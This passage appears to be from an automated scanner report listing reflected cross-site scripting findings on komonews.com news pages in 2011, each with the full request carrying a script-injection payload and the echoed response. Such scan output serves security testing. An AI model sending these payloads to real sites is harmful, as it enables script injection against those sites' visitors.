Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 40669


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Photo gall
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116123569.html?24b06"><script>alert(1)</script>51dacf53101=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.424. http://www.komonews.com/news/entertainment/116189709.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/entertainment/116189709.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d14dd"><script>alert(1)</script>cf3829b5cae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116189709.html?d14dd"><script>alert(1)</script>cf3829b5cae=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56794


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Earth to J
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116189709.html?d14dd"><script>alert(1)</script>cf3829b5cae=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.425. http://www.komonews.com/news/entertainment/116665019.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/entertainment/116665019.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f03"><script>alert(1)</script>7c279062389 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116665019.html?b6f03"><script>alert(1)</script>7c279062389=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53897


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Bieber fan
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116665019.html?b6f03"><script>alert(1)</script>7c279062389=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.426. http://www.komonews.com/news/entertainment/116680394.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/entertainment/116680394.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd4a4"><script>alert(1)</script>464baf18d3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116680394.html?fd4a4"><script>alert(1)</script>464baf18d3a=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54806


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Singer Buj
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116680394.html?fd4a4"><script>alert(1)</script>464baf18d3a=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.427. http://www.komonews.com/news/entertainment/116692424.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/entertainment/116692424.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fb27"><script>alert(1)</script>91a41cb9407 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116692424.html?5fb27"><script>alert(1)</script>91a41cb9407=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r7-u31-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54160


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Chris Brow
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116692424.html?5fb27"><script>alert(1)</script>91a41cb9407=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.428. http://www.komonews.com/news/entertainment/116704174.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/entertainment/116704174.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2f4"><script>alert(1)</script>6d803cea48f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116704174.html?da2f4"><script>alert(1)</script>6d803cea48f=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53896


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   O'Donnell
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116704174.html?da2f4"><script>alert(1)</script>6d803cea48f=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.429. http://www.komonews.com/news/entertainment/116707059.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/entertainment/116707059.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26483"><script>alert(1)</script>493e37d1789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116707059.html?26483"><script>alert(1)</script>493e37d1789=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 40489


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Photos: Fu
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116707059.html?26483"><script>alert(1)</script>493e37d1789=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.430. http://www.komonews.com/news/entertainment/116707059.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/entertainment/116707059.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d053a"><script>alert(1)</script>160ff22fdb5 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116707059.html?ref=guiltypleasuresd053a"><script>alert(1)</script>160ff22fdb5 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 40492


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Photos: Fu
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116707059.html?ref=guiltypleasuresd053a"><script>alert(1)</script>160ff22fdb5" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.431. http://www.komonews.com/news/entertainment/116710289.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/entertainment/116710289.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7a1c"><script>alert(1)</script>b13f5ec2d89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116710289.html?c7a1c"><script>alert(1)</script>b13f5ec2d89=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53311


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Alyssa Mil
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116710289.html?c7a1c"><script>alert(1)</script>b13f5ec2d89=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.432. http://www.komonews.com/news/entertainment/116737029.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/entertainment/116737029.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1f63"><script>alert(1)</script>ccd130576bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116737029.html?b1f63"><script>alert(1)</script>ccd130576bf=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55468


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Lena Horne
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116737029.html?b1f63"><script>alert(1)</script>ccd130576bf=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.433. http://www.komonews.com/news/entertainment/116737029.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/entertainment/116737029.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f910"><script>alert(1)</script>824444c91c was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116737029.html?ref=guiltypleasures8f910"><script>alert(1)</script>824444c91c HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55484


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Lena Horne
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116737029.html?ref=guiltypleasures8f910"><script>alert(1)</script>824444c91c" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.434. http://www.komonews.com/news/entertainment/116737724.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/entertainment/116737724.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edb6c"><script>alert(1)</script>e5ad59b8bc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116737724.html?edb6c"><script>alert(1)</script>e5ad59b8bc5=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57439


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Judge to L
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116737724.html?edb6c"><script>alert(1)</script>e5ad59b8bc5=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.435. http://www.komonews.com/news/entertainment/116737724.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/entertainment/116737724.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd82f"><script>alert(1)</script>8b9a4694de9 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/entertainment/116737724.html?ref=guiltypleasuresfd82f"><script>alert(1)</script>8b9a4694de9 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57456


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Judge to L
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/entertainment/116737724.html?ref=guiltypleasuresfd82f"><script>alert(1)</script>8b9a4694de9" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.436. http://www.komonews.com/news/health/116753189.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/health/116753189.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a076"><script>alert(1)</script>1bb743a14e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/health/116753189.html?4a076"><script>alert(1)</script>1bb743a14e1=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r7-u31-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:13:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54572


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   21,000 had
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/health/116753189.html?4a076"><script>alert(1)</script>1bb743a14e1=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.437. http://www.komonews.com/news/local/116231884.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /news/local/116231884.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483eb"><script>alert(1)</script>8407c6c48ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116231884.html?483eb"><script>alert(1)</script>8407c6c48ab=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54178


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Spokane ma
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116231884.html?483eb"><script>alert(1)</script>8407c6c48ab=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

